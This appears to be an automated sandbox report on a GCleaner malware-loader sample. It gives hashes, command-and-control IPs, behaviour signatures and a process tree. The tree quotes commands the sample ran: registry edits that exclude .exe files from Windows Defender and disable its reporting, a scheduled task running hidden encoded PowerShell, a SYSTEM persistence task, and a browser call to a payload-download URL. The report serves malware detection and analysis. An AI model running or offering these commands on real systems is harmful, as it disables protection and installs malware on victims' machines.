Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
06-04-2023 16:58
General
-
Target
trainerv_7VxI5OpA.exe
-
Size
4.3MB
-
MD5
3a0c3723ddc9efd1b7d584e10312576b
-
SHA1
c695283f4205420f3d9812a6c4b7eb1f4b484063
-
SHA256
f3dbe218bac2da1fabff8364428a0548f03e2c93442082d2c0ed1b2686040e32
-
SHA512
b6a645802e9b90e6a0eda5e40e7b48dea2c80c76f59640b50c27c72e78115e31fd161ab98401740a0404382dddcf4d543ff99746bd68363dac61817a3e54e0d2
-
SSDEEP
98304:QcPNiPea8mdie9Ohxt1rqaAA6YHxkjWvCK90w4LlY/+IbFEmFusXct:xNiPezmdie9MxtgdA6YHuWvB90wklq+V
Malware Config
Extracted
gcleaner
85.31.45.39
85.31.45.250
85.31.45.251
85.31.45.88
Signatures
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 16 IoCs
-
Loads dropped DLL 11 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks for any installed AV software in registry 1 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 27 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 56 IoCs
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\trainerv_7VxI5OpA.exe"C:\Users\Admin\AppData\Local\Temp\trainerv_7VxI5OpA.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-1V717.tmp\is-2JTDB.tmp"C:\Users\Admin\AppData\Local\Temp\is-1V717.tmp\is-2JTDB.tmp" /SL4 $A0044 "C:\Users\Admin\AppData\Local\Temp\trainerv_7VxI5OpA.exe" 4258240 517122⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 313⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 314⤵
-
C:\Program Files (x86)\CR DBF\CR_DBF.exe"C:\Program Files (x86)\CR DBF\CR_DBF.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 8684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 9084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 10804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1404⤵
- Program crash
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause ImageComparer453⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause ImageComparer454⤵
-
C:\Program Files (x86)\CR DBF\CR_DBF.exe"C:\Program Files (x86)\CR DBF\CR_DBF.exe" 0eb237d1d48855f4296a6c8a5ffe762e3⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 8604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 8684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 9844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 10524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 10724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 11084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 11124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 12964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 13044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 10004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 12684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 14484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 16804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 9964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 14324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 18164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 10844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 20884⤵
- Program crash
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://setupservice.xyz/eyJ0eXBlIjoxLCJ0Ijo4OTgxNTA4OTgxMjk2NCwibmFtZSI6InRyYWluZXIudi4xLjAuemlwIiwic2lkIjoiMjYwMTc2NzQifQ==4⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb0,0x108,0x7ffa022646f8,0x7ffa02264708,0x7ffa022647185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff605dd5460,0x7ff605dd5470,0x7ff605dd54806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 17924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 17484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 20884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 12924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 18244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 14404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 18244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 13284⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7SHGjwyP\7xRKT9ADbPaHwyd.exeC:\Users\Admin\AppData\Local\Temp\7SHGjwyP\7xRKT9ADbPaHwyd.exe /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HPCNP.tmp\is-7GJA9.tmp"C:\Users\Admin\AppData\Local\Temp\is-HPCNP.tmp\is-7GJA9.tmp" /SL4 $4027E "C:\Users\Admin\AppData\Local\Temp\7SHGjwyP\7xRKT9ADbPaHwyd.exe" 2215905 52736 /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 96⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 97⤵
-
C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe"C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" install6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe"C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" start6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause Zerkalo3316⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause Zerkalo3317⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 18964⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\cmXwtlLI\iIng49SBYSID87KcW.exeC:\Users\Admin\AppData\Local\Temp\cmXwtlLI\iIng49SBYSID87KcW.exe /m SUB=0eb237d1d48855f4296a6c8a5ffe762e4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-H937U.tmp\is-B3S2A.tmp"C:\Users\Admin\AppData\Local\Temp\is-H937U.tmp\is-B3S2A.tmp" /SL4 $202B4 "C:\Users\Admin\AppData\Local\Temp\cmXwtlLI\iIng49SBYSID87KcW.exe" 1337110 52736 /m SUB=0eb237d1d48855f4296a6c8a5ffe762e5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-JNLGM.tmp\FileDate46\FileDate46.exe"C:\Users\Admin\AppData\Local\Temp\is-JNLGM.tmp\FileDate46\FileDate46.exe" /m SUB=0eb237d1d48855f4296a6c8a5ffe762e6⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate46.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-JNLGM.tmp\FileDate46\FileDate46.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "FileDate46.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 266⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 267⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 21644⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\OnWR6gkI\XBf2h.exeC:\Users\Admin\AppData\Local\Temp\OnWR6gkI\XBf2h.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-783DQ.tmp\is-U55FV.tmp"C:\Users\Admin\AppData\Local\Temp\is-783DQ.tmp\is-U55FV.tmp" /SL4 $202FA "C:\Users\Admin\AppData\Local\Temp\OnWR6gkI\XBf2h.exe" 1803256 486405⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe"C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 8404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 22084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 21924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 22084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\bGChaH0N\c7t9uOY6.exeC:\Users\Admin\AppData\Local\Temp\bGChaH0N\c7t9uOY6.exe /S /site_id=6906894⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUylsBiSX"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUylsBiSX" /SC once /ST 02:49:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUylsBiSX"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIxjpVXoYOizHLMzgM" /SC once /ST 19:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\GIVcqKU.exe\" js /site_id 690689 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 17924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 18444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 8404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 18604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 21324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 21164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 19204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 12924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 18724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 8404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 17484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4892 -ip 48921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4892 -ip 48921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4892 -ip 48921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4892 -ip 48921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2624 -ip 26241⤵
-
